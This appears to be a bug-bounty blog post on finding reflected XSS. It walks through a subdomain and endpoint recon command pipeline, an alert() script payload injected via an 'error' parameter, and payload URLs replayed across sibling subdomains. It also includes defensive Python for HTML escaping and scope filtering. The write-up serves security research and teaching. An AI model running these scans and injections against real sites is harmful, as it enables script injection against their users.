How I got multiple easy RXSS

abdelrahem mekky
3 min read · Jun 23, 2024


Peace be upon you

Assalamualaikum, guys! My name is Abdelrahem Mekky (0xmekky), and I have found multiple Reflected XSS vulnerabilities.

If you do not know what XSS is, you can read about it here.

Let me explain how I found multiple RXSS vulnerabilities.

1- First, extract and collect the subdomains using the SubEnum tool:

subenum -d target.com -r
After the tool finishes, save the output to a file, subdomians.txt.

2- Now let's gather the endpoints from the Wayback Machine and Common Crawl.

I will use the katana tool and waybackurls:

cat subdomians.txt | katana -jc >> Endpoints.txt
cat subdomians.txt | waybackurls >> Endpoints.txt

3- Because most of these endpoints will be duplicates, we remove them with the uro tool:

cat Endpoints.txt | uro >> Endpoints_Final.txt

4- Get the endpoints whose parameters may be vulnerable to XSS using the gf tool (xss pattern):

cat Endpoints_Final.txt | gf xss >> XSS.txt

5- Then we use the Gxss tool to find the parameters whose values are reflected in the response:

cat XSS.txt | Gxss -p khXSS -o XSS_Reflected.txt

Once we have the parameters whose values are reflected in the response, we move on.

6- Let's get started with manual testing:

https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
As you can see, I give each parameter a distinct value so I can tell exactly which one is reflected in the source code.
As the response shows, only one parameter, error, is reflected in the source code.

7- You can inject any JavaScript payload and it will execute, e.g.:

JavaScript payload :- mekky2><script>alert("0xmekky")</script>

URL :-https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
booooooooooom
As you can see here, the entire payload appears unchanged in the source code, which means there is no filter or WAF in front of this page.
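To show what "the entire payload is in the source code" means on the server side, here is an added Python example; it is not the author's code and not part of any of the tools above. It assumes a hypothetical, constructed page renderer that writes the error parameter into the HTML, puts the hardened version (HTML encoding with html.escape) next to it, and reuses the post's one-distinct-value-per-parameter trick as a regression check: each parameter is tagged with its own probe, and only a probe that comes back byte-for-byte, with < and > intact, is reported as an unencoded reflection. The probe URL is the one from the post.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the page in the post: a minimal renderer that writes
# the 'error' query parameter straight into the HTML without encoding. This is
# the behaviour the post observed, reproduced here so the fix can be tested.
def render_error_page_vulnerable(params):
    error = params.get("error", "")
    return f'<html><body><div class="error">{error}</div></body></html>'

# Hardened form: the user-controlled value is HTML-escaped (quotes included)
# before it reaches the markup, so '<' and '>' can never open a tag.
def render_error_page_hardened(params):
    error = html.escape(params.get("error", ""), quote=True)
    return f'<html><body><div class="error">{error}</div></body></html>'

def param_names_from_url(url):
    """Return the query parameter names of a URL, in order of first appearance."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return list(query)

def find_unencoded_reflections(render, param_names, marker="mekky"):
    """Tag each parameter with its own probe value (the post's mekky1, mekky2,
    ... trick) and return the names whose probe comes back unchanged.

    The probe carries '<' and '>' so that a value reflected *with* HTML encoding
    ('&lt;' / '&gt;') counts as safe; only a byte-for-byte reflection is reported.
    """
    probes = {name: f"{marker}{i}<>" for i, name in enumerate(param_names, start=1)}
    body = render(probes)
    return [name for name, probe in probes.items() if probe in body]

# The probe URL from the post (hostname kept exactly as the author wrote it).
PROBE_URL = ("https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2"
             "&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8"
             "&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13"
             "&path=mekky14")

if __name__ == "__main__":
    names = param_names_from_url(PROBE_URL)
    print("vulnerable renderer reflects unencoded:",
          find_unencoded_reflections(render_error_page_vulnerable, names))
    print("hardened renderer reflects unencoded:",
          find_unencoded_reflections(render_error_page_hardened, names))
```

Run as a script it reports `['error']` for the vulnerable renderer and `[]` for the hardened one. The same check can be pointed at any renderer or template function in a code base, which is how a development team can catch a raw reflection before it ships rather than after a report like this one.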

8- I noticed in the subdomains file that there are many subdomains under one sub-subdomain.

e.g.

Sub-subdomain: subsub.test.exap.com

Subdomains under that sub-subdomain:
1- new.subsub.test.exap.com
2- new2.subsub.test.exap.com
3- new3.subsub.test.exap.com
etc.

9- Filter the file for that value with grep to extract everything underneath subsub.test.exap.com:

cat subdomians.txt | grep "subsub.test.exap.com" 

The result:
new.subsub.test.exap.com
new2.subsub.test.exap.com
new3.subsub.test.exap.com

I also noticed that these hosts serve the same page as subsub.test.exap.com.
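One caveat on the grep in step 9: the pattern "subsub.test.exap.com" is unanchored and, in a regex, each "." matches any character, so it also matches names such as notsubsub.test.exap.com or subsubxtest.exap.com that are not under that parent at all. For a scope list (which assets share the affected page, which ones need the fix), whole-label matching is what you want. The following added Python example is not the author's code; it filters a constructed host list on whole labels, normalises case and trailing dots, and also produces the anchored grep -E pattern that does the same job in a shell pipeline.

```python
import re

def hosts_under(parent, hosts):
    """Return the hosts that are strictly below `parent` in the DNS tree.

    Matching is done on whole labels (the name must end with '.' + parent), so
    'notsubsub.test.exap.com' and 'subsubxtest.exap.com' are excluded even though
    an unanchored grep "subsub.test.exap.com" would match both ('.' is any
    character in a regex). Case and a trailing dot are normalised away and
    duplicates collapse; the parent itself is not returned.
    """
    parent = parent.lower().rstrip(".")
    suffix = "." + parent
    found = {h.strip().lower().rstrip(".") for h in hosts if h.strip()}
    return sorted(h for h in found if h.endswith(suffix))

def grep_pattern(parent):
    """The equivalent anchored pattern for grep -E, dots escaped and end-anchored."""
    return r"\." + re.escape(parent) + "$"

# Constructed sample of a subdomain list; only the first three entries belong
# under subsub.test.exap.com, the rest are look-alikes an unanchored grep hits.
SAMPLE_SUBDOMAINS = """\
new.subsub.test.exap.com
NEW2.subsub.test.exap.com.
new3.subsub.test.exap.com
subsub.test.exap.com
notsubsub.test.exap.com
subsubxtest.exap.com
www.exap.com
"""

if __name__ == "__main__":
    for host in hosts_under("subsub.test.exap.com", SAMPLE_SUBDOMAINS.splitlines()):
        print(host)
    print("grep -E", repr(grep_pattern("subsub.test.exap.com")))
```

Against the sample list this yields exactly new, new2 and new3 under subsub.test.exap.com; the shell equivalent is `grep -E '\.subsub\.test\.exap\.com$' subdomians.txt`.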

10- After collecting the subdomains as above:

new.subsub.test.exap.com 
new2.subsub.test.exap.com
new3.subsub.test.exap.com

I tried adding the same endpoint to all of those subdomains:

new.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14 
new2.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new3.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14

The payload executed successfully on those subdomains as well.
